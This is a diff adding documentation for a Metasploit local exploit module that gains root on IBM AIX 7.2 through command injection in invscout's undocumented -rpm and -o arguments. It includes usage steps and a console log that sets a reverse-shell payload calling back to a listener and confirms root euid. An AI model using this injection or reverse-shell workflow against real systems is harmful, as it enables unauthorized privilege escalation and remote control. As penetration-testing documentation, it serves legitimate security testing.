documentation/modules/exploit/aix/local/invscout_rpm_priv_esc.md

```diff
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in IBM AIX
+invscout set-uid root utility present in AIX 7.2 and earlier.
+
+The undocumented -rpm argument can be used to install an RPM file;
+and the undocumented -o argument passes arguments to the rpm utility
+without validation, leading to command injection with effective-uid
+root privileges.
+
+This module has been tested successfully on AIX 7.2.
+
+## Verification Steps
+
+1. `msfconsole`
+1. Get a session
+1. `use exploit/aix/local/invscout_rpm_priv_esc`
+1. `set session <session>`
+1. `run`
+
+## Options
+
+### INVSCOUT_PATH
+
+Path to invscout executable (default: `/usr/sbin/invscout`)
+
+## Scenarios
+
+### IBM AIX 7.2
+
+```
+msf6 > use exploit/aix/local/invscout_rpm_priv_esc
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set session 1
+session => 1
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > run
+
+[*] Started reverse TCP double handler on 192.168.200.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Output: uid=204(user) gid=1(staff) euid=0(root)
```

Comment:
Tested with a normal user account in the `staff` group, but works fine as any user/group, such as `nobody`.